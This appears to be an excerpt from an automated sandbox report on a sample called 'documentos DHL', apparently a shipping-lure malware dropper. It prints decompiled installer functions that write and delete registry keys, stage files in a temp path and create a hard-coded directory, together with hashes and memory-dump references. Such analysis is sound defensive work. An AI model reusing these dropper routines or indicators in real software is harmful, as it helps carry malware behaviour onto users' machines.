Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID:
String ID: FCEAF61A311585AC6CA556831186CD793724A0B7900E741FEFF1200B1061D2A9B415E783220261FF3D536B1B0D612FC63F91BA8D4234ABBAB3D7F7893FE45659AE7B55866CD10E685CD8C02E2F47BBF3462FF67720F6F9244921F8462D05B15FACCEB33EB2C6AF53DA46A58968758B5A7F01499FB422FFD6C38FD57CC3FC9B971AE6
API String ID: 0-964589852
Opcode ID: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
Instruction ID: 1a645af2666a8cd9619cdf871bd9e2c738fb6a6c353dc56c4864b2e7a25bf22b
Opcode Fuzzy Hash: fd90919654d861d793b9259fd4ddd35531221e69384e43b7f209bc021a7cca94
Instruction Fuzzy Hash: 71816771E04228DBEF28CFA8C8447ADBBB1FB44301F14816AD956BB2C1C7786986DF45

Uniqueness

Uniqueness Score: -1.00%

Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E10001759(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
				void _v36;
				struct HINSTANCE__* _t34;
				intOrPtr _t38;
				void* _t44;
				void* _t45;
				void* _t46;
				void* _t50;
				intOrPtr _t53;
				signed int _t57;
				signed int _t61;
				void* _t65;
				void* _t66;
				void* _t70;
				void* _t74;

				_t74 = __esi;
				_t66 = __edi;
				_t65 = __edx;
				 *0x1000406c = _a8;
				 *0x10004070 = _a16;
				 *0x10004074 = _a12;
				 *((intOrPtr*)(_a20 + 0xc))( *0x10004048, E100015B1);
				_push(1); // executed
				_t34 = E10001B18(); // executed
				_t50 = _t34;
				if(_t50 == 0) {
					L28:
					return _t34;
				} else {
					if( *((intOrPtr*)(_t50 + 4)) != 1) {
						E10002286(_t50);
					}
					_push(_t50);
					E100022D0(_t65);
					_t53 =  *((intOrPtr*)(_t50 + 4));
					if(_t53 == 0xffffffff) {
						L14:
						if(( *(_t50 + 0x1010) & 0x00000004) == 0) {
							if( *((intOrPtr*)(_t50 + 4)) == 0) {
								_t34 = E100024A4(_t50);
							} else {
								_push(_t74);
								_push(_t66);
								_t12 = _t50 + 0x1018; // 0x1018
								_t57 = 8;
								memcpy( &_v36, _t12, _t57 << 2);
								_t38 = E100015B4(_t50);
								_t15 = _t50 + 0x1018; // 0x1018
								_t70 = _t15;
								 *((intOrPtr*)(_t50 + 0x1020)) = _t38;
								 *_t70 = 4;
								E100024A4(_t50);
								_t61 = 8;
								_t34 = memcpy(_t70,  &_v36, _t61 << 2);
							}
						} else {
							E100024A4(_t50);
							_t34 = GlobalFree(E10001272(E100015B4(_t50)));
						}
						if( *((intOrPtr*)(_t50 + 4)) != 1) {
							_t34 = E10002467(_t50);
							if(( *(_t50 + 0x1010) & 0x00000040) != 0 &&  *_t50 == 1) {
								_t34 =  *(_t50 + 0x1008);
								if(_t34 != 0) {
									_t34 = FreeLibrary(_t34);
								}
							}
							if(( *(_t50 + 0x1010) & 0x00000020) != 0) {
								_t34 = E1000153D( *0x10004068);
							}
						}
						if(( *(_t50 + 0x1010) & 0x00000002) != 0) {
							goto L28;
						} else {
							return GlobalFree(_t50);
						}
					}
					_t44 =  *_t50;
					if(_t44 == 0) {
						if(_t53 != 1) {
							goto L14;
						}
						E10002B57(_t50);
						L12:
						_t50 = _t44;
						L13:
						goto L14;
					}
					_t45 = _t44 - 1;
					if(_t45 == 0) {
						L8:
						_t44 = E1000289C(_t53, _t50); // executed
						goto L12;
					}
					_t46 = _t45 - 1;
					if(_t46 == 0) {
						E10002640(_t50);
						goto L13;
					}
					if(_t46 != 1) {
						goto L14;
					}
					goto L8;
				}
			}

0x10001759
0x10001759
0x10001759
0x10001763
0x1000176b
0x10001778
0x10001786
0x10001789
0x1000178b
0x10001790
0x10001795
0x100018a8
0x100018a8
0x1000179b
0x1000179f
0x100017a2
0x100017a7
0x100017a8
0x100017a9
0x100017af
0x100017b5
0x100017e5
0x100017ec
0x10001810
0x1000184f
0x10001812
0x10001812
0x10001813
0x10001816
0x1000181c
0x10001820
0x10001823
0x10001828
0x10001828
0x1000182f
0x10001835
0x1000183b
0x10001847
0x10001848
0x1000184b
0x100017ee
0x100017ef
0x10001804
0x10001804
0x10001859
0x1000185c
0x10001869
0x10001870
0x10001878
0x1000187b
0x1000187b
0x10001878
0x10001888
0x10001890
0x10001895
0x10001888
0x1000189d
0x00000000
0x1000189f
0x00000000
0x100018a0
0x1000189d
0x100017b9
0x100017bc
0x100017da
0x00000000
0x00000000
0x100017dd
0x100017e2
0x100017e2
0x100017e4
0x00000000
0x100017e4
0x100017be
0x100017bf
0x100017c7
0x100017c8
0x00000000
0x100017c8
0x100017c1
0x100017c2
0x100017d0
0x00000000
0x100017d0
0x100017c5
0x00000000
0x00000000
0x00000000
0x100017c5

APIs

Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D

GlobalFree.KERNEL32(00000000), ref: 10001804
FreeLibrary.KERNEL32(?), ref: 1000187B
GlobalFree.KERNEL32(00000000), ref: 100018A0

Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,8BC3C95B), ref: 100022B8

Part of subcall function 10002640: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B2

Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020), ref: 100015CD

Strings

, xrefs: 10001881

Memory Dump Source

Source File: 00000002.00000002.1825292109.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.1825259905.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825336540.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.1825369944.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_documentos DHL.jbxd

Similarity

API ID: Global$Free$Alloc$Librarylstrcpy
String ID:
API String ID: 1791698881-3916222277
Opcode ID: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
Instruction ID: 65685ba44f5e0dd4e22f20931bb662b0f8110762eb821eef9687284fed8b6370
Opcode Fuzzy Hash: 80a71440bbdc6676df6433b68331a89e098fd0a61e7fd3645cfd834030fcbe9d
Instruction Fuzzy Hash: 4A31AC75804241AAFB14DF649CC9BDA37E8FF043D4F158065FA0AAA08FDFB4A984C761

Uniqueness

Uniqueness Score: -1.00%

Function 004032C2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004032C2(intOrPtr _a4) {
				intOrPtr _t10;
				intOrPtr _t11;
				signed int _t12;
				void* _t14;
				void* _t15;
				long _t16;
				void* _t18;
				intOrPtr _t19;
				intOrPtr _t31;
				long _t32;
				intOrPtr _t34;
				intOrPtr _t36;
				void* _t37;
				intOrPtr _t49;

				_t32 =  *0x418ed4; // 0x6d5e
				_t34 = _t32 -  *0x40ce40 + _a4;
				 *0x42a250 = GetTickCount() + 0x1f4;
				if(_t34 <= 0) {
					L22:
					E00402E72(1);
					return 0;
				}
				E00403441( *0x418ee4);
				SetFilePointer( *0x40a01c,  *0x40ce40, 0, 0); // executed
				 *0x418ee0 = _t34;
				 *0x418ed0 = 0;
				while(1) {
					_t10 =  *0x418ed8; // 0x52d48
					_t31 = 0x4000;
					_t11 = _t10 -  *0x418ee4;
					if(_t11 <= 0x4000) {
						_t31 = _t11;
					}
					_t12 = E0040342B(0x414ed0, _t31);
					if(_t12 == 0) {
						break;
					}
					 *0x418ee4 =  *0x418ee4 + _t31;
					 *0x40ce60 = 0x414ed0;
					 *0x40ce64 = _t31;
					L6:
					L6:
					if( *0x42a254 != 0 &&  *0x42a300 == 0) {
						_t19 =  *0x418ee0; // 0x3fbc
						 *0x418ed0 = _t19 -  *0x418ed4 - _a4 +  *0x40ce40;
						E00402E72(0);
					}
					 *0x40ce68 = 0x40ced0;
					 *0x40ce6c = 0x8000; // executed
					_t14 = E0040690B(0x40ce48); // executed
					if(_t14 < 0) {
						goto L20;
					}
					_t36 =  *0x40ce68; // 0x410e92
					_t37 = _t36 - 0x40ced0;
					if(_t37 == 0) {
						__eflags =  *0x40ce64; // 0x0
						if(__eflags != 0) {
							goto L20;
						}
						__eflags = _t31;
						if(_t31 == 0) {
							goto L20;
						}
						L16:
						_t16 =  *0x418ed4; // 0x6d5e
						if(_t16 -  *0x40ce40 + _a4 > 0) {
							continue;
						}
						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
						goto L22;
					}
					_t18 = E00405F54( *0x40a01c, 0x40ced0, _t37); // executed
					if(_t18 == 0) {
						_push(0xfffffffe);
						L21:
						_pop(_t15);
						return _t15;
					}
					 *0x40ce40 =  *0x40ce40 + _t37;
					_t49 =  *0x40ce64; // 0x0
					if(_t49 != 0) {
						goto L6;
					}
					goto L16;
					L20:
					_push(0xfffffffd);
					goto L21;
				}
				return _t12 | 0xffffffff;
			}

0x004032c5
0x004032d2
0x004032e5
0x004032ea
0x0040341a
0x0040341c
0x00000000
0x00403422
0x004032f6
0x00403309
0x0040330f
0x00403315
0x00403320
0x00403320
0x00403325
0x0040332a
0x00403332
0x00403334
0x00403334
0x0040333d
0x00403344
0x00000000
0x00000000
0x0040334a
0x00403350
0x00403356
0x00000000
0x0040335c
0x00403362
0x0040336c
0x00403382
0x00403387
0x0040338c
0x00403392
0x00403398
0x004033a2
0x004033a9
0x00000000
0x00000000
0x004033ab
0x004033b1
0x004033b3
0x004033d6
0x004033dc
0x00000000
0x00000000
0x004033de
0x004033e0
0x00000000
0x00000000
0x004033e2
0x004033e2
0x004033f5
0x00000000
0x00000000
0x00403404
0x00000000
0x00403404
0x004033bd
0x004033c4
0x00403411
0x00403417
0x00403417
0x00000000
0x00403417
0x004033c6
0x004033cc
0x004033d2
0x00000000
0x00000000
0x00000000
0x00403415
0x00403415
0x00000000
0x00403415
0x00000000

APIs

GetTickCount.KERNEL32 ref: 004032D6

Part of subcall function 00403441: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313F,?), ref: 0040344F

SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000,00000000,0040A230,?), ref: 00403309
SetFilePointer.KERNELBASE(00006D5E,00000000,00000000,00414ED0,00004000,?,00000000,004031EC,00000004,00000000,00000000,?,?,00403166,000000FF,00000000), ref: 00403404

Strings

FCEAF61A311585AC6CA556831186CD793724A0B7900E741FEFF1200B1061D2A9B415E783220261FF3D536B1B0D612FC63F91BA8D4234ABBAB3D7F7893FE45659AE7B55866CD10E685CD8C02E2F47BBF3462FF67720F6F9244921F8462D05B15FACCEB33EB2C6AF53DA46A58968758B5A7F01499FB422FFD6C38FD57CC3FC9B971AE6, xrefs: 0040331B, 004033B6

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: FilePointer$CountTick
String ID: FCEAF61A311585AC6CA556831186CD793724A0B7900E741FEFF1200B1061D2A9B415E783220261FF3D536B1B0D612FC63F91BA8D4234ABBAB3D7F7893FE45659AE7B55866CD10E685CD8C02E2F47BBF3462FF67720F6F9244921F8462D05B15FACCEB33EB2C6AF53DA46A58968758B5A7F01499FB422FFD6C38FD57CC3FC9B971AE6
API String ID: 1092082344-964589852
Opcode ID: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
Instruction ID: 8a5bf560653b24f1bd3cd60389d49066fb51751ebaffca469d7b7cf87711dc5f
Opcode Fuzzy Hash: 63f894617870b8b9b6b4d0f35ad55c68ae2789ba15d09fbc75adc17a06edb544
Instruction Fuzzy Hash: 10316C72610211DBD711DF29EEC49A63BA9F78439A714823FE900B62E0CBB95D058B9D

Uniqueness

Uniqueness Score: -1.00%

Function 004023DE Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004023DE(void* __eax, int __ebx, intOrPtr __edx) {
				void* _t20;
				void* _t21;
				int _t24;
				long _t25;
				char _t27;
				int _t30;
				void* _t32;
				intOrPtr _t33;
				void* _t34;
				intOrPtr _t37;
				void* _t39;
				void* _t42;

				_t33 = __edx;
				_t30 = __ebx;
				_t37 =  *((intOrPtr*)(_t39 - 0x18));
				_t34 = __eax;
				 *(_t39 - 0x4c) =  *(_t39 - 0x14);
				 *(_t39 - 0x3c) = E00402C37(2);
				_t20 = E00402C37(0x11);
				 *(_t39 - 4) = 1;
				_t21 = E00402CC7(_t42, _t34, _t20, 2); // executed
				 *(_t39 + 8) = _t21;
				if(_t21 != __ebx) {
					_t24 = 0;
					if(_t37 == 1) {
						E00402C37(0x23);
						_t24 = lstrlenW(0x40b5d8) + _t29 + 2;
					}
					if(_t37 == 4) {
						_t27 = E00402C15(3);
						_pop(_t32);
						 *0x40b5d8 = _t27;
						 *((intOrPtr*)(_t39 - 0x30)) = _t33;
						_t24 = _t37;
					}
					if(_t37 == 3) {
						_t24 = E004031BA(_t32,  *((intOrPtr*)(_t39 - 0x1c)), _t30, 0x40b5d8, 0x1800);
					}
					_t25 = RegSetValueExW( *(_t39 + 8),  *(_t39 - 0x3c), _t30,  *(_t39 - 0x4c), 0x40b5d8, _t24); // executed
					if(_t25 == 0) {
						 *(_t39 - 4) = _t30;
					}
					_push( *(_t39 + 8));
					RegCloseKey();
				}
				 *0x42a2e8 =  *0x42a2e8 +  *(_t39 - 4);
				return 0;
			}

0x004023de
0x004023de
0x004023de
0x004023e1
0x004023e8
0x004023f2
0x004023f5
0x004023fe
0x00402405
0x0040240c
0x0040240f
0x00402415
0x0040241f
0x00402423
0x0040242e
0x0040242e
0x00402435
0x00402439
0x0040243e
0x0040243f
0x00402445
0x00402448
0x00402448
0x0040244c
0x00402458
0x00402458
0x00402469
0x00402471
0x00402473
0x00402473
0x00402476
0x00402551
0x00402551
0x00402ac2
0x00402ace

APIs

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp,00000023,00000011,00000002), ref: 00402429
RegSetValueExW.KERNELBASE(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp,00000000,00000011,00000002), ref: 00402469
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp,00000000,00000011,00000002), ref: 00402551

Strings

C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp, xrefs: 0040241A, 00402428, 0040243F, 00402453, 0040245E

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CloseValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsw5DC6.tmp
API String ID: 2655323295-885433172
Opcode ID: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
Instruction ID: 1eab41df84c6b24c6b923ea001d17cdc0cfdc7d4c8a499a75fdfc4da8179f3fa
Opcode Fuzzy Hash: e48b1e85c28757713ab227aa479e2b9ceb42c74d784ae5642fab68139845f862
Instruction Fuzzy Hash: A1118171E00108AFEB10AFA5DE49EAEBAB4EB54354F11803AF504F71D1DBB84D459B58

Uniqueness

Uniqueness Score: -1.00%

Function 00402D2A Relevance: 6.1, APIs: 4, Instructions: 64
registryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E00402D2A(void* __eflags, void* _a4, short* _a8, signed int _a12) {
				void* _v8;
				short _v532;
				void* _t19;
				signed int _t26;
				intOrPtr* _t28;
				signed int _t33;
				signed int _t34;
				signed int _t35;

				_t34 = _a12;
				_t35 = _t34 & 0x00000300;
				_t33 = _t34 & 0x00000001;
				_t19 = E0040621D(__eflags, _a4, _a8, _t35 | 0x00000008,  &_v8); // executed
				if(_t19 == 0) {
					while(RegEnumKeyW(_v8, 0,  &_v532, 0x105) == 0) {
						__eflags = _t33;
						if(__eflags != 0) {
							RegCloseKey(_v8);
							return 1;
						}
						_t26 = E00402D2A(__eflags, _v8,  &_v532, _a12);
						__eflags = _t26;
						if(_t26 != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t28 = E0040678A(3);
					if(_t28 == 0) {
						return RegDeleteKeyW(_a4, _a8);
					}
					return  *_t28(_a4, _a8, _t35, 0);
				}
				return _t19;
			}

0x00402d35
0x00402d3e
0x00402d47
0x00402d53
0x00402d5a
0x00402d7e
0x00402d64
0x00402d66
0x00402db9
0x00000000
0x00402dc1
0x00402d75
0x00402d7a
0x00402d7c
0x00000000
0x00000000
0x00402d7c
0x00402d98
0x00402da0
0x00402da7
0x00000000
0x00402dca
0x00000000
0x00402db2
0x00402dd4

APIs

RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402D8F
RegCloseKey.ADVAPI32(?), ref: 00402D98
RegCloseKey.ADVAPI32(?), ref: 00402DB9

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
Instruction ID: 0f4b1bf7762f76a333ccd5711aab570045f86c75fcf3a50f9e11fcc9d843940a
Opcode Fuzzy Hash: 589b69b30b93e72d379e73a42f84ccf1a961e1a5d2401dd27ca86d8d7f2ff702
Instruction Fuzzy Hash: 21116A32540509FBDF129F90CE09BEE7B69EF58344F110076B905B50E0E7B5DE21AB68

Uniqueness

Uniqueness Score: -1.00%

Function 004015C1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E004015C1(short __ebx, void* __eflags) {
				void* _t17;
				int _t23;
				void* _t25;
				signed char _t26;
				short _t28;
				short _t31;
				short* _t34;
				void* _t36;

				_t28 = __ebx;
				 *(_t36 + 8) = E00402C37(0xfffffff0);
				_t17 = E00405D2C(_t16);
				_t32 = _t17;
				if(_t17 != __ebx) {
					do {
						_t34 = E00405CAE(_t32, 0x5c);
						_t31 =  *_t34;
						 *_t34 = _t28;
						if(_t31 != _t28) {
							L5:
							_t25 = E00405960( *(_t36 + 8));
						} else {
							_t42 =  *((intOrPtr*)(_t36 - 0x20)) - _t28;
							if( *((intOrPtr*)(_t36 - 0x20)) == _t28 || E0040597D(_t42) == 0) {
								goto L5;
							} else {
								_t25 = E004058E3( *(_t36 + 8)); // executed
							}
						}
						if(_t25 != _t28) {
							if(_t25 != 0xb7) {
								L9:
								 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
							} else {
								_t26 = GetFileAttributesW( *(_t36 + 8)); // executed
								if((_t26 & 0x00000010) == 0) {
									goto L9;
								}
							}
						}
						 *_t34 = _t31;
						_t32 = _t34 + 2;
					} while (_t31 != _t28);
				}
				if( *((intOrPtr*)(_t36 - 0x24)) == _t28) {
					_push(0xfffffff5);
					E00401423();
				} else {
					E00401423(0xffffffe6);
					E004063B0(L"C:\\Users\\Arthur\\Zorillinae\\Skaalpundet\\Inkbslistes\\Tset\\Demodulationen\\Iagttagerposition",  *(_t36 + 8));
					_t23 = SetCurrentDirectoryW( *(_t36 + 8)); // executed
					if(_t23 == 0) {
						 *((intOrPtr*)(_t36 - 4)) =  *((intOrPtr*)(_t36 - 4)) + 1;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t36 - 4));
				return 0;
			}

0x004015c1
0x004015c9
0x004015cc
0x004015d1
0x004015d5
0x004015d7
0x004015df
0x004015e1
0x004015e4
0x004015ea
0x00401604
0x00401607
0x004015ec
0x004015ec
0x004015ef
0x00000000
0x004015fa
0x004015fd
0x004015fd
0x004015ef
0x0040160e
0x00401615
0x00401624
0x00401624
0x00401617
0x0040161a
0x00401622
0x00000000
0x00000000
0x00401622
0x00401615
0x00401627
0x0040162b
0x0040162c
0x004015d7
0x00401634
0x00401663
0x00402245
0x00401636
0x00401638
0x00401645
0x0040164d
0x00401655
0x0040165b
0x0040165b
0x00401655
0x00402ac2
0x00402ace

APIs

Part of subcall function 00405D2C: CharNextW.USER32(?,?,00425F30,?,00405DA0,00425F30,00425F30,?,?,76522EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76522EE0,00000000), ref: 00405D3A
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D3F
Part of subcall function 00405D2C: CharNextW.USER32(00000000), ref: 00405D57

GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161A

Part of subcall function 004058E3: CreateDirectoryW.KERNELBASE(?,?,00000000), ref: 00405926

SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition,?,00000000,000000F0), ref: 0040164D

Strings

C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition, xrefs: 00401640

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID: CharNext$Directory$AttributesCreateCurrentFile
String ID: C:\Users\user\Zorillinae\Skaalpundet\Inkbslistes\Tset\Demodulationen\Iagttagerposition
API String ID: 1892508949-3479193329
Opcode ID: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
Instruction ID: a4cb8c34a70438e14e420fb04ab38ad532f12a03bdfc5322accc4ce246dd33dc
Opcode Fuzzy Hash: 63e3afcb8f518b8f961fa91b0460bec2abaa85340c93af8d37e8798651ac2648
Instruction Fuzzy Hash: 9011BE31504104EBCF31AFA0CD0199F36A0EF14368B28493BEA45B22F1DB3E4D51DA4E

Uniqueness

Uniqueness Score: -1.00%

Function 00405388 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E00405388(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t9;
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423714 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423714 = _t16;
							E00404D5E();
						}
						L11:
						_t9 = CallWindowProcW( *0x42371c, _a4, _t15, _a12, _t16); // executed
						return _t9;
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404CDE(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404391(0x413);
				return 0;
			}

0x0040538c
0x00405396
0x004053b2
0x004053d4
0x004053d7
0x004053dd
0x004053e7
0x004053e8
0x004053ea
0x004053f0
0x004053f0
0x004053fa
0x00405408
0x00000000
0x00405408
0x004053bf
0x004053f7
0x004053f7
0x00000000
0x004053f7
0x004053cb
0x004053cd
0x00000000
0x004053cd
0x0040539c
0x00000000
0x00000000
0x004053a3
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 004053B7
CallWindowProcW.USER32(?,?,?,?), ref: 00405408

Part of subcall function 00404391: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A3

Strings

, xrefs: 00405398

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
